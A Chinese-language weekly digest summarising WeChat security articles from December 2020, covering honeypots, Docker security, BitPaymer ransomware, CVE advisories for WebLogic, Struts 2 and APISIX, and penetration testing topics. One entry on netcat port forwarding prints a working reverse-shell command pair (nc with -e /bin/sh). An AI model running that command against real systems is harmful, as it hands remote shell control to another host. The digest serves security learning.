2020年 第49周 微信公众号精选安全技术文章总览
洞见网安 2020-12-7
0x1 PHP中self关键字详解
小阿辉谈安全 2020-12-13T15:39:21 ymh
本文详细介绍了PHP中self关键字的使用。文章首先解释了self与parent、static和this的区别,指出self总是指向当前类。parent引用父类方法,static用于静态延迟绑定,this指向对象实例。接着,文章通过示例代码展示了self在静态成员函数、非静态成员函数中的用法,以及如何抑制多态行为。最后,文章还讨论了self的一些特殊用法和槽点,如在不同PHP版本中的表现差异,以及与static和this的混淆使用。文章对PHP开发者理解和使用self关键字具有参考价值。
0x2 数世咨询《蜜罐诱捕能力指南》发布,观安信息名列前茅
观安信息 2020-12-11T18:00:00
数世咨询发布了《蜜罐诱捕能力指南》,并推出了蜜罐诱捕能力点阵图,评选出17家蜜罐诱捕类厂商。观安信息因其魅影威胁监测系统在蜜罐诱捕领域的表现获得认可。指南指出,蜜罐技术需要升级以满足主动防御的需求,并提出了“蜜罐诱捕”的概念,强调其主动引诱攻击者进入非业务环境的特点。文章详细介绍了蜜罐诱捕技术的关键元素,包括整体管理、诱捕环境、引诱手段和防御主动化。指南还强调了蜜罐诱捕技术对安全的价值,如检测未知威胁、防范内部威胁横向移动等。此外,文章还探讨了蜜罐诱捕技术的落地难点,如业务贴合度、市场认知、安全运维人员能力以及安全分析能力等。最后,文章概述了蜜罐诱捕市场的现状、未来趋势,包括人工智能的助力、蜜罐能力的普及化以及内网监测的应用。
蜜罐技术 欺骗防御 安全厂商竞争力 攻防演练 威胁情报 内网安全 人工智能辅助
0x3 Docker容器安全的分析研究
信息安全与通信保密杂志社 2020-12-11T14:03:31 © Cismag
本文对Docker容器技术在云计算中的应用进行了深入分析。Docker作为一种轻量级虚拟化技术,以其快速启动、低资源需求和高效率等特点受到广泛欢迎。文章详细探讨了Docker容器在使用过程中面临的安全风险,包括镜像安全、容器虚拟化安全、网络安全和容器服务稳定运行风险。针对这些风险,文章提出了相应的解决方案,如镜像安全机制、容器虚拟化安全机制、容器网络安全机制和容器服务程序安全机制。文章强调,在Docker容器生产部署时,应全面考虑安全风险,结合安全解决方案,形成容器安全应用最佳实践。
容器安全 虚拟化安全 镜像安全 网络安全 服务稳定安全 安全机制 漏洞检测 资源管理 防火墙策略
0x4 以僵尸网络进行投递的BitPaymer勒索病毒
水网火安 2020-12-10T21:44:00
BitPaymer勒索病毒是一种针对企业用户的恶意软件,它通过Dridex僵尸网络进行传播。该病毒利用系统中的system32目录下的服务进程来执行加密操作,加密后的文件后缀名为“.0riz0n”。BitPaymer使用AES_256加密算法对文件进行加密,除了.exe和.dll文件外,所有文件都会被加密。勒索病毒使用RSA公钥加密密钥,使得在没有私钥的情况下,文件无法被解密。如果拥有RSA私钥,可以通过一系列步骤来解密文件,包括读取特定文件的后缀名文件,获取加密密钥和padding数据,进行Base64编码转换,使用RSA私钥解密AES密钥,最后使用AES_256加密算法解密文件。为了预防这种病毒,建议提高网络安全意识,定期备份重要数据,更新系统,修补漏洞,使用强口令,安装杀毒软件并更新病毒库,以及安装防勒索软件。文章中还包含了一些关于病毒行为的汇编代码和病毒文件的详细信息。
勒索软件 僵尸网络 加密算法 企业安全 恶意软件分析 安全防护
0x5 可怕的漏洞,SQL注入漏洞实战演习
仙网攻城狮 2020-12-10T13:51:27 © 太白
一个严重的SQL注入漏洞,可能会直接导致一家公司破产!
0x6 高危的Chrome漏洞允许黑客入侵浏览器
水网火安 2020-12-09T22:01:18
谷歌近期更新了Chrome网络浏览器,共修复了8个漏洞,其中包括4个高危漏洞。这些高危漏洞可能导致浏览器内存错误,为黑客攻击留下隐患。网络安全和基础设施安全机构(CISA)已发布安全公告,建议用户尽快更新。高危漏洞包括内存释放后重用、剪贴板、媒体和扩展组件等,其中CVE-2020-16040漏洞可能引发跨站脚本攻击。谷歌表示,具体漏洞细节将在大多数用户更新后公开。更新Chrome浏览器的方法是通过客户端右上方的下拉菜单,选择“帮助”然后“关于谷歌浏览器”来启动更新功能。
Web浏览器安全 内存安全 漏洞修复 跨站脚本攻击(XSS) 操作系统安全 安全公告 用户安全意识 安全更新
0x7 【漏洞分析】WebLogic未授权命令执行漏洞(CVE-2020-14882/CVE-2020-14883)
安博通 2020-12-09T20:08:49 © 安博通
0x8 【漏洞预警】OpenSSL拒绝服务漏洞(CVE-2020-1971)
安博通 2020-12-09T20:08:49 © 安博通
0x9 TCP/IP 做安全的你的还不懂?
必火安全 2020-12-09T19:30:00 必火男神
本文详细介绍了TCP/IP模型及其四个层次:链路层、网络层、传输层和应用层。文章首先解释了TCP/IP模型与OSI模型的对应关系,并阐述了数据在TCP/IP模型中的封装和拆封过程。接着,文章深入探讨了数据链路层、网络层、传输层和应用层的关键协议和功能,包括物理层、MAC地址、IP地址、TCP和UDP协议、DNS以及ICMP协议。此外,文章还介绍了网络诊断工具ping和traceroute的工作原理,并对TCP和UDP协议进行了对比分析,最后讨论了TCP连接的建立与终止过程,包括三次握手和四次挥手,以及TCP的流量控制和拥塞控制机制。
网络协议 网络安全基础 TCP/IP 数据传输 错误处理与控制 网络诊断工具 TCP连接管理 域名系统
0xa NC端口转发
Linux网络安全 2020-12-09T16:20:46
该文详细介绍了一次通过NC(Netcat)工具实现端口转发的实验,旨在从Kali Linux系统中获取对百度云服务器的控制权限。实验环境包括一台内网IP为192.168.123.33的Kali 2020系统和一台百度云服务器。首先,在Kali中监听5555端口,使用命令nc -lvp 5555;然后,在百度云服务器上执行nc 192.168.123.33 5555 -e /bin/sh,将百度云服务器的shell绑定到Kali监听的端口上,以此达到远程控制的目的。需要注意的是,由于服务器和Kali不在同一网段,实际操作中作者使用了映射后的IP和端口来完成实验。此外,文章还提到如果将这两个步骤反过来操作,即可以在云服务器上监听,由Kali发起连接,也能实现云服务器对本地Kali系统的远程控制。此实验对于网络安全学习者理解端口转发、网络穿透等概念具有重要意义。
0xb 物联网安全系列 | MQTT渗透实战
银基科技INGEEK 2020-12-09T12:00:00
本文深入探讨了MQTT协议在物联网安全中的应用,特别是在Web端和移动端的安全风险。文章首先介绍了MQTT协议的基本概念,包括发布者、订阅者和代理等角色,以及其在不同端的应用场景。接着,详细分析了MQTT在实际开发中的安全漏洞,包括敏感信息泄露、跨站脚本攻击(XSS)等。文章提供了多种获取MQTT配置信息的技巧,如使用Chrome浏览器的开发者工具、Burp Suite、Source Detector等工具,以及通过分析JavaScript文件和反编译Android应用等方法。此外,文章还介绍了如何利用这些信息进行渗透测试,包括连接MQTT、发布和订阅消息、枚举Topic等。最后,文章强调了在实际操作中应注意合法合规,不要进行非法测试和破坏。
物联网安全 MQTT协议 安全漏洞 Web安全 移动端安全 渗透测试 安全配置 开源安全
0xc Apache APISIX Admin API 默认访问令牌漏洞风险提示
安恒信息CERT 2020-12-09T09:07:11 ©
近日,安恒应急响应中心发现Apache APISIX存在Admin API默认访问令牌漏洞(CVE-2020-13945),该漏洞影响Apache APISIX 1.2至1.5版本。在Admin API启用且未设置IP访问策略的情况下,攻击者可利用默认令牌访问APISIX。建议受影响的用户尽快更新到2.0以上版本或采取临时缓解措施,如修改admin_key值或增加访问认证。尽管漏洞细节和利用代码尚未公开,但存在被利用的风险,因此建议及时更新或部署安全防护。
Apache APISIX 漏洞 默认访问令牌漏洞 网络安全更新 漏洞修复 版本影响 安全防护 应急响应
0xd Apache Struts 2高危漏洞风险提示
安恒信息CERT 2020-12-09T09:07:11 ©
2020年12月8日,Apache官方发布了一则关于Struts 2框架的漏洞公告,指出Struts 2.0.0至2.5.25版本存在一个OGNL表达式注入的远程代码执行漏洞(CVE-2020-17530)。该漏洞允许攻击者在特定条件下执行远程代码,从而可能获得目标系统的管理权限。受影响的版本包括Struts 2.0.0至Struts 2.5.25,建议用户升级到2.5.26或更高版本以修复漏洞。Apache官方提供了下载地址,同时GitHub也有相关下载资源。为了缓解风险,建议用户及时升级,并在开发过程中避免在标签属性中使用未经验证的输入。此外,安恒应急响应中心提醒用户关注官方漏洞公告,并采取必要的安全措施。
漏洞公告 远程代码执行 Struts 2 CVE编号 安全修复 影响范围 安全防护 安全开发建议 官方公告
0xe 用友NC文件上传漏洞风险提示
安恒信息CERT 2020-12-08T22:31:11 ©
近日,安恒应急响应中心发现用友NC产品存在一个文件上传漏洞,该漏洞允许攻击者在无需登录系统的情况下上传任意文件,可能获得目标系统管理权限。此漏洞影响NC6.5之后的版本,建议用户及时关注官方安全漏洞公告和补丁更新动态。由于官方尚未发布补丁,用户应关注厂商的安全公告,并可能需要部署安全设备以拦截恶意文件上传。紧急措施包括关注漏洞细节的公开和厂商补丁更新,以及采取必要的安全防护措施。
文件上传漏洞 远程代码执行 用友NC产品安全 安全补丁更新 应急响应 网络安全风险提示
0xf Docker 恶意软件泛滥,开发人员需谨慎
水网火安 2020-12-07T21:21:13
本文探讨了Docker和Kubernetes系统在近年来面临的恶意软件攻击问题。随着云技术的普及,网络犯罪团伙开始利用这些系统中的配置错误进行攻击,主要目标是部署加密货币挖矿恶意软件。文章指出,许多开发者和工程师未能吸取教训,继续错误配置Docker服务器,导致其管理界面暴露在网上。常见的配置错误包括未对Docker远程管理API进行认证。文章列举了多个恶意软件的例子,如Doki、Ngrok、Kinsing等,它们扫描并利用Docker管理API部署恶意软件。最近,奇虎360发现了名为Blackrota的新恶意后门程序,它利用了Docker Remote API的未经授权访问漏洞。由于目前Blackrota仅发现用于Linux系统,其潜在用途和影响尚不明确。
Docker 安全 容器安全 加密货币挖矿恶意软件 远程访问漏洞 后门程序 云安全 网络安全漏洞
0x10 SRC逻辑漏洞小结
必火安全 2020-12-07T19:40:00 必火男神
本文作者分享了在网络安全中挖掘SRC逻辑漏洞的总结和案例。文章从业务注册、登录、找回密码、购买支付、抽奖活动、订单信息、会员系统、传输过程、验证码问题、短信轰炸、水平越权、数据泄露、任意用户密码重置、支付逻辑漏洞等多个方面进行了详细的分析。作者介绍了各种逻辑漏洞的类型,并提供了实际的案例和操作方法,帮助读者更好地理解和挖掘这些漏洞。文章还涉及了一些高级的攻击技巧,如支付绕过、订单替换、秘钥泄漏等,强调了网络安全的重要性。
逻辑漏洞 SRC(安全响应中心) 短信/邮箱轰炸 XSS(跨站脚本攻击) SQL注入 支付逻辑漏洞 数据泄露 CSRF(跨站请求伪造)
本站文章为人工采集,目的是为了方便更好的提供免费聚合服务,如有侵权请告知。具体请在留言告知,我们将清除对此公众号的监控,并清空相关文章。所有内容,均摘自于互联网,不得以任何方式将其用于商业目的。由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,本站以及文章作者不承担任何责任。
